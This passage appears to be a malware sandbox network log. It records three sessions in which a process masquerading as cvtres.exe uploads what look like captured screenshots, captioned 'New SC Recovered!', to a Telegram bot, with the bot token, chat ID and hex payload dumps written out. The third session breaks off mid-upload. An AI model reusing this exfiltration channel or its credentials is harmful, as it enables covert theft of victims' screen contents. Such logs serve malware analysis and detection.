                                                        2024-10-30 15:26:25 UTC262OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dd4c81660ee58d
                                                        Host: api.telegram.org
                                                        Content-Length: 76478
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        2024-10-30 15:26:25 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:26:25 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 63 38 31 36 36 30 65 65 35 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 63 38 31 36 36 30 65 65 35 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 31 33 2f 32 30 32 35 20 32 32 3a 34 34 3a 33 38 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dd4c81660ee58dContent-Disposition: form-data; name="chat_id"7102900518-----------------------------8dd4c81660ee58dContent-Disposition: form-data; name="caption"New SC Recovered!Time: 02/13/2025 22:44:38User
                                                        2024-10-30 15:26:25 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                        Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|
                                                        2024-10-30 15:26:25 UTC16355OUTData Raw: 31 8a 95 2e 66 b5 4c cb a2 8a 2b d7 3c 10 a4 a5 a2 80 2e 68 df f2 18 b4 ff 00 ae 82 bd 02 bc ff 00 47 ff 00 90 bd a7 fd 75 5f e7 5d 46 af 7f 73 f6 a8 b4 cd 3f 02 ee 61 b9 a4 3d 22 4f 5a f2 71 b1 73 ac 92 ed fe 67 bb 97 4d 42 83 6f bf e8 8d 8a ab 7a db 04 2e 55 99 56 4e 76 a9 6f e1 61 d0 7d 6b 24 f8 6f 4d 00 35 fc f2 5c 4c dd 64 96 52 32 7d a9 92 cb 67 e1 82 c0 5c 5c cf e6 0c a5 b1 6d c1 40 ea 7d ab 97 d9 46 5a 41 dd fa 1d fe d6 51 d6 6a cb d4 cb d6 ec e1 8d fe d1 6e ae 88 c7 95 68 d9 40 3e d9 15 93 5d 6f 89 66 8e e3 42 86 68 9b 72 49 22 b2 9f 62 0d 72 55 ea 60 a5 29 53 b4 ba 3b 1e 1e 63 08 c6 b5 e3 d5 5c 29 05 2d 15 d8 70 09 45 2d 25 00 14 51 45 00 14 94 b4 50 01 49 4b 45 03 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 96 92 98 05 14 51 40 05 25 2d 25 03 0a
                                                        Data Ascii: 1.fL+<.hGu_]Fs?a="OZqsgMBoz.UVNvoa}k$oM5\LdR2}g\\m@}FZAQjnh@>]ofBhrI"brU`)S;c\)-pE-%QEPIKE(((Q@%-%
                                                        2024-10-30 15:26:25 UTC16355OUTData Raw: 61 54 b1 fd 05 15 0c ac b1 cd 14 92 12 b1 e1 d1 d8 2e ed a1 d0 ae 71 df 19 cd 3a ae 51 83 71 dc 54 23 19 54 8c 67 b1 25 a3 7d b1 ad d6 26 8c 19 dd e3 5d cc 47 2a bb 8e 78 f4 a7 5b 86 b8 f3 42 6d 53 0c 6f 23 ef 38 da 17 af e3 59 11 49 15 98 b3 b7 59 d6 75 41 72 f2 4b 1a 3e d0 cf 16 c5 51 90 0f 6e 78 ef 4b 1e a4 37 43 23 09 11 e7 8a 57 bc 25 49 1e 67 94 c8 a0 63 d4 92 c7 fd ef 6a f3 a5 8a aa af 65 d3 43 d8 8e 02 83 e5 bc bd 75 34 e5 6f 26 3b 79 1c ae db 88 56 64 da 73 90 46 71 f5 e4 7e 75 25 c2 2d ac d7 11 dd 5c db c1 f6 7f 2f 7b 33 31 19 70 4a 8f 95 4f a1 ac 74 d4 51 63 4f 96 47 36 d6 d0 bd b6 14 e3 cf 58 c2 32 9c f6 c8 53 e9 f2 7b d3 e2 bc 0f 0c e8 97 56 f0 ce d1 59 8d d7 76 c6 55 26 34 21 f8 d8 dc 82 47 38 fa 1a 1e 2a af 44 54 70 18 7b b6 df e2 6a 0d 8a
                                                        Data Ascii: aT.q:QqT#Tg%}&]G*x[BmSo#8YIYuArK>QnxK7C#W%IgcjeCu4o&;yVdsFq~u%-\/{31pJOtQcOG6X2S{VYvU&4!G8*DTp{j
                                                        2024-10-30 15:26:25 UTC15447OUTData Raw: 14 00 51 45 14 0c 29 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 94 b4 94 0c 28 a2 8a 60 14 94 b4 94 00 51 45 14 0c 29 29 68 a4 02 51 45 14 c6 14 51 45 00 25 14 51 40 05 14 51 40 09 45 2e 29 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 30 a2 8a 28 00 a2 92 8a 00 53 49 45 14 0c 28 a3 34 94 00 b4 9c 51 45 31 86 4a f4 24 7d 0d 48 b3 cc bd 24 6f ce a2 a3 34 5a e0 59 17 b3 8e a5 4f d4 54 82 ff 00 fb f0 21 aa 24 d1 9a 39 10 58 d1 5b bb 63 f7 a2 71 f4 35 22 cb 66 df f2 d9 97 fd e5 ac 9d e0 53 4c 9e 82 93 a6 bb 87 25 cd d5 8e 27 ff 00 57 73 19 fc 6a c4 36 ed 10 91 8b 29 1e 59 e4 1a e5 d9 cd 20 96 45 ce 1d 87 d0 d6 72 a6 de 97 0f 64 df 51 1b a9 e9 4d fa d2 e7 34 95 a9 ba 42 50 68 fc 69 28 28 4a 3f 2a 3a 51 40 c3 f1 a4 e9 4b 49 f4 a4 01 f5 a3 34 52 50 30 fc a9 28 a2 81 87
                                                        Data Ascii: QE)(JZJQE(`QE))hQEQE%Q@Q@E.)(QERPEP0(SIE(4QE1J$}H$o4ZYOT!$9X[cq5"fSL%'Wsj6)Y ErdQM4BPhi((J?*:Q@KI4RP0(
                                                        2024-10-30 15:26:25 UTC10892OUTData Raw: 5e b6 17 f8 31 fe ba 9f 37 98 7f bc cb e5 f9 21 28 a5 a4 ae 93 88 5a a0 97 3f 63 d7 a2 b9 cf 11 48 8c 7e 9c 67 f4 ab f5 4a e6 cb cd 95 a5 f3 31 9e d8 a8 95 ac ee 75 61 26 a1 52 ec ea 2f 75 5b 1b 5d 7f 4d 8e de e6 17 b6 2f 2b cc ca e0 ae 64 27 a9 e9 c5 60 78 b2 e2 de 4d 42 0b 6b 39 16 4b 6b 58 16 24 64 60 c0 fe 23 f0 fc ab 5f fe 10 2f fa 89 ff 00 e4 0f fe ca 94 78 08 64 67 53 24 77 c4 1f fd 95 70 42 a5 08 34 f9 b6 3d f9 46 ac 95 ac 6f 5e 9b d1 74 fe 4a ea 45 38 c7 93 f6 6d 9d 3b 6f f9 bf 3a 93 4e 37 66 76 f3 d6 fc 2e de 3e d1 e4 6d ce 47 fc f3 e7 3f a5 68 d1 5e 7f 3e 96 b1 d7 cb ad cf 36 5f ba 3e 94 b4 8b f7 47 d2 96 bd f8 7c 28 f8 ea 9f 1b f5 0a 28 a2 ac 80 ae 93 c1 7f f2 0d ba ff 00 af a7 fe 4b 5c dd 74 9e 0b ff 00 90 6d d7 fd 7d 3f f2 5a f2 f3 1f b1 f3
                                                        Data Ascii: ^17!(Z?cH~gJ1ua&R/u[]M/+d'`xMBk9KkX$d`#_/xdgS$wpB4=Fo^tJE8m;o:N7fv.>mG?h^>6_>G|((K\tm}?Z
                                                        2024-10-30 15:26:25 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 63 38 31 36 36 30 65 65 35 38 64 2d 2d 0d 0a
                                                        Data Ascii: -----------------------------8dd4c81660ee58d--
                                                        2024-10-30 15:26:26 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:26:25 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.450021149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:26:40 UTC262OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dd53711b0bb0b7
                                                        Host: api.telegram.org
                                                        Content-Length: 76478
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        2024-10-30 15:26:40 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:26:40 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 33 37 31 31 62 30 62 62 30 62 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 33 37 31 31 62 30 62 62 30 62 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 32 32 2f 32 30 32 35 20 31 38 3a 33 35 3a 33 35 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dd53711b0bb0b7Content-Disposition: form-data; name="chat_id"7102900518-----------------------------8dd53711b0bb0b7Content-Disposition: form-data; name="caption"New SC Recovered!Time: 02/22/2025 18:35:35User
                                                        2024-10-30 15:26:40 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                        Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|
                                                        2024-10-30 15:26:40 UTC16355OUTData Raw: 31 8a 95 2e 66 b5 4c cb a2 8a 2b d7 3c 10 a4 a5 a2 80 2e 68 df f2 18 b4 ff 00 ae 82 bd 02 bc ff 00 47 ff 00 90 bd a7 fd 75 5f e7 5d 46 af 7f 73 f6 a8 b4 cd 3f 02 ee 61 b9 a4 3d 22 4f 5a f2 71 b1 73 ac 92 ed fe 67 bb 97 4d 42 83 6f bf e8 8d 8a ab 7a db 04 2e 55 99 56 4e 76 a9 6f e1 61 d0 7d 6b 24 f8 6f 4d 00 35 fc f2 5c 4c dd 64 96 52 32 7d a9 92 cb 67 e1 82 c0 5c 5c cf e6 0c a5 b1 6d c1 40 ea 7d ab 97 d9 46 5a 41 dd fa 1d fe d6 51 d6 6a cb d4 cb d6 ec e1 8d fe d1 6e ae 88 c7 95 68 d9 40 3e d9 15 93 5d 6f 89 66 8e e3 42 86 68 9b 72 49 22 b2 9f 62 0d 72 55 ea 60 a5 29 53 b4 ba 3b 1e 1e 63 08 c6 b5 e3 d5 5c 29 05 2d 15 d8 70 09 45 2d 25 00 14 51 45 00 14 94 b4 50 01 49 4b 45 03 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 96 92 98 05 14 51 40 05 25 2d 25 03 0a
                                                        Data Ascii: 1.fL+<.hGu_]Fs?a="OZqsgMBoz.UVNvoa}k$oM5\LdR2}g\\m@}FZAQjnh@>]ofBhrI"brU`)S;c\)-pE-%QEPIKE(((Q@%-%
                                                        2024-10-30 15:26:40 UTC16355OUTData Raw: 61 54 b1 fd 05 15 0c ac b1 cd 14 92 12 b1 e1 d1 d8 2e ed a1 d0 ae 71 df 19 cd 3a ae 51 83 71 dc 54 23 19 54 8c 67 b1 25 a3 7d b1 ad d6 26 8c 19 dd e3 5d cc 47 2a bb 8e 78 f4 a7 5b 86 b8 f3 42 6d 53 0c 6f 23 ef 38 da 17 af e3 59 11 49 15 98 b3 b7 59 d6 75 41 72 f2 4b 1a 3e d0 cf 16 c5 51 90 0f 6e 78 ef 4b 1e a4 37 43 23 09 11 e7 8a 57 bc 25 49 1e 67 94 c8 a0 63 d4 92 c7 fd ef 6a f3 a5 8a aa af 65 d3 43 d8 8e 02 83 e5 bc bd 75 34 e5 6f 26 3b 79 1c ae db 88 56 64 da 73 90 46 71 f5 e4 7e 75 25 c2 2d ac d7 11 dd 5c db c1 f6 7f 2f 7b 33 31 19 70 4a 8f 95 4f a1 ac 74 d4 51 63 4f 96 47 36 d6 d0 bd b6 14 e3 cf 58 c2 32 9c f6 c8 53 e9 f2 7b d3 e2 bc 0f 0c e8 97 56 f0 ce d1 59 8d d7 76 c6 55 26 34 21 f8 d8 dc 82 47 38 fa 1a 1e 2a af 44 54 70 18 7b b6 df e2 6a 0d 8a
                                                        Data Ascii: aT.q:QqT#Tg%}&]G*x[BmSo#8YIYuArK>QnxK7C#W%IgcjeCu4o&;yVdsFq~u%-\/{31pJOtQcOG6X2S{VYvU&4!G8*DTp{j
                                                        2024-10-30 15:26:40 UTC15447OUTData Raw: 14 00 51 45 14 0c 29 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 94 b4 94 0c 28 a2 8a 60 14 94 b4 94 00 51 45 14 0c 29 29 68 a4 02 51 45 14 c6 14 51 45 00 25 14 51 40 05 14 51 40 09 45 2e 29 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 30 a2 8a 28 00 a2 92 8a 00 53 49 45 14 0c 28 a3 34 94 00 b4 9c 51 45 31 86 4a f4 24 7d 0d 48 b3 cc bd 24 6f ce a2 a3 34 5a e0 59 17 b3 8e a5 4f d4 54 82 ff 00 fb f0 21 aa 24 d1 9a 39 10 58 d1 5b bb 63 f7 a2 71 f4 35 22 cb 66 df f2 d9 97 fd e5 ac 9d e0 53 4c 9e 82 93 a6 bb 87 25 cd d5 8e 27 ff 00 57 73 19 fc 6a c4 36 ed 10 91 8b 29 1e 59 e4 1a e5 d9 cd 20 96 45 ce 1d 87 d0 d6 72 a6 de 97 0f 64 df 51 1b a9 e9 4d fa d2 e7 34 95 a9 ba 42 50 68 fc 69 28 28 4a 3f 2a 3a 51 40 c3 f1 a4 e9 4b 49 f4 a4 01 f5 a3 34 52 50 30 fc a9 28 a2 81 87
                                                        Data Ascii: QE)(JZJQE(`QE))hQEQE%Q@Q@E.)(QERPEP0(SIE(4QE1J$}H$o4ZYOT!$9X[cq5"fSL%'Wsj6)Y ErdQM4BPhi((J?*:Q@KI4RP0(
                                                        2024-10-30 15:26:40 UTC10892OUTData Raw: 5e b6 17 f8 31 fe ba 9f 37 98 7f bc cb e5 f9 21 28 a5 a4 ae 93 88 5a a0 97 3f 63 d7 a2 b9 cf 11 48 8c 7e 9c 67 f4 ab f5 4a e6 cb cd 95 a5 f3 31 9e d8 a8 95 ac ee 75 61 26 a1 52 ec ea 2f 75 5b 1b 5d 7f 4d 8e de e6 17 b6 2f 2b cc ca e0 ae 64 27 a9 e9 c5 60 78 b2 e2 de 4d 42 0b 6b 39 16 4b 6b 58 16 24 64 60 c0 fe 23 f0 fc ab 5f fe 10 2f fa 89 ff 00 e4 0f fe ca 94 78 08 64 67 53 24 77 c4 1f fd 95 70 42 a5 08 34 f9 b6 3d f9 46 ac 95 ac 6f 5e 9b d1 74 fe 4a ea 45 38 c7 93 f6 6d 9d 3b 6f f9 bf 3a 93 4e 37 66 76 f3 d6 fc 2e de 3e d1 e4 6d ce 47 fc f3 e7 3f a5 68 d1 5e 7f 3e 96 b1 d7 cb ad cf 36 5f ba 3e 94 b4 8b f7 47 d2 96 bd f8 7c 28 f8 ea 9f 1b f5 0a 28 a2 ac 80 ae 93 c1 7f f2 0d ba ff 00 af a7 fe 4b 5c dd 74 9e 0b ff 00 90 6d d7 fd 7d 3f f2 5a f2 f3 1f b1 f3
                                                        Data Ascii: ^17!(Z?cH~gJ1ua&R/u[]M/+d'`xMBk9KkX$d`#_/xdgS$wpB4=Fo^tJE8m;o:N7fv.>mG?h^>6_>G|((K\tm}?Z
                                                        2024-10-30 15:26:40 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 33 37 31 31 62 30 62 62 30 62 37 2d 2d 0d 0a
                                                        Data Ascii: -----------------------------8dd53711b0bb0b7--
                                                        2024-10-30 15:26:41 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:26:41 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.450022149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:26:59 UTC262OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dd5ba41d84a6e0
                                                        Host: api.telegram.org
                                                        Content-Length: 76478
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        2024-10-30 15:26:59 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:26:59 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 62 61 34 31 64 38 34 61 36 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 62 61 34 31 64 38 34 61 36 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 30 35 2f 32 30 32 35 20 30 34 3a 35 30 3a 35 36 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dd5ba41d84a6e0Content-Disposition: form-data; name="chat_id"7102900518-----------------------------8dd5ba41d84a6e0Content-Disposition: form-data; name="caption"New SC Recovered!Time: 03/05/2025 04:50:56User
                                                        2024-10-30 15:26:59 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                        Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|
                                                        2024-10-30 15:26:59 UTC16355OUTData Raw: 31 8a 95 2e 66 b5 4c cb a2 8a 2b d7 3c 10 a4 a5 a2 80 2e 68 df f2 18 b4 ff 00 ae 82 bd 02 bc ff 00 47 ff 00 90 bd a7 fd 75 5f e7 5d 46 af 7f 73 f6 a8 b4 cd 3f 02 ee 61 b9 a4 3d 22 4f 5a f2 71 b1 73 ac 92 ed fe 67 bb 97 4d 42 83 6f bf e8 8d 8a ab 7a db 04 2e 55 99 56 4e 76 a9 6f e1 61 d0 7d 6b 24 f8 6f 4d 00 35 fc f2 5c 4c dd 64 96 52 32 7d a9 92 cb 67 e1 82 c0 5c 5c cf e6 0c a5 b1 6d c1 40 ea 7d ab 97 d9 46 5a 41 dd fa 1d fe d6 51 d6 6a cb d4 cb d6 ec e1 8d fe d1 6e ae 88 c7 95 68 d9 40 3e d9 15 93 5d 6f 89 66 8e e3 42 86 68 9b 72 49 22 b2 9f 62 0d 72 55 ea 60 a5 29 53 b4 ba 3b 1e 1e 63 08 c6 b5 e3 d5 5c 29 05 2d 15 d8 70 09 45 2d 25 00 14 51 45 00 14 94 b4 50 01 49 4b 45 03 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 96 92 98 05 14 51 40 05 25 2d 25 03 0a
                                                        Data Ascii: 1.fL+<.hGu_]Fs?a="OZqsgMBoz.UVNvoa}k$oM5\LdR2}g\\m@}FZAQjnh@>]ofBhrI"brU`)S;c\)-pE-%QEPIKE(((Q@%-%
                                                        2024-10-30 15:26:59 UTC16355OUTData Raw: 61 54 b1 fd 05 15 0c ac b1 cd 14 92 12 b1 e1 d1 d8 2e ed a1 d0 ae 71 df 19 cd 3a ae 51 83 71 dc 54 23 19 54 8c 67 b1 25 a3 7d b1 ad d6 26 8c 19 dd e3 5d cc 47 2a bb 8e 78 f4 a7 5b 86 b8 f3 42 6d 53 0c 6f 23 ef 38 da 17 af e3 59 11 49 15 98 b3 b7 59 d6 75 41 72 f2 4b 1a 3e d0 cf 16 c5 51 90 0f 6e 78 ef 4b 1e a4 37 43 23 09 11 e7 8a 57 bc 25 49 1e 67 94 c8 a0 63 d4 92 c7 fd ef 6a f3 a5 8a aa af 65 d3 43 d8 8e 02 83 e5 bc bd 75 34 e5 6f 26 3b 79 1c ae db 88 56 64 da 73 90 46 71 f5 e4 7e 75 25 c2 2d ac d7 11 dd 5c db c1 f6 7f 2f 7b 33 31 19 70 4a 8f 95 4f a1 ac 74 d4 51 63 4f 96 47 36 d6 d0 bd b6 14 e3 cf 58 c2 32 9c f6 c8 53 e9 f2 7b d3 e2 bc 0f 0c e8 97 56 f0 ce d1 59 8d d7 76 c6 55 26 34 21 f8 d8 dc 82 47 38 fa 1a 1e 2a af 44 54 70 18 7b b6 df e2 6a 0d 8a
                                                        Data Ascii: aT.q:QqT#Tg%}&]G*x[BmSo#8YIYuArK>QnxK7C#W%IgcjeCu4o&;yVdsFq~u%-\/{31pJOtQcOG6X2S{VYvU&4!G8*DTp{j
                                                        2024-10-30 15:26:59 UTC15447OUTData Raw: 14 00 51 45 14 0c 29 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 94 b4 94 0c 28 a2 8a 60 14 94 b4 94 00 51 45 14 0c 29 29 68 a4 02 51 45 14 c6 14 51 45 00 25 14 51 40 05 14 51 40 09 45 2e 29 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 30 a2 8a 28 00 a2 92 8a 00 53 49 45 14 0c 28 a3 34 94 00 b4 9c 51 45 31 86 4a f4 24 7d 0d 48 b3 cc bd 24 6f ce a2 a3 34 5a e0 59 17 b3 8e a5 4f d4 54 82 ff 00 fb f0 21 aa 24 d1 9a 39 10 58 d1 5b bb 63 f7 a2 71 f4 35 22 cb 66 df f2 d9 97 fd e5 ac 9d e0 53 4c 9e 82 93 a6 bb 87 25 cd d5 8e 27 ff 00 57 73 19 fc 6a c4 36 ed 10 91 8b 29 1e 59 e4 1a e5 d9 cd 20 96 45 ce 1d 87 d0 d6 72 a6 de 97 0f 64 df 51 1b a9 e9 4d fa d2 e7 34 95 a9 ba 42 50 68 fc 69 28 28 4a 3f 2a 3a 51 40 c3 f1 a4 e9 4b 49 f4 a4 01 f5 a3 34 52 50 30 fc a9 28 a2 81 87
                                                        Data Ascii: QE)(JZJQE(`QE))hQEQE%Q@Q@E.)(QERPEP0(SIE(4QE1J$}H$o4ZYOT!$9X[cq5"fSL%'Wsj6)Y ErdQM4BPhi((J?*:Q@KI4RP0(
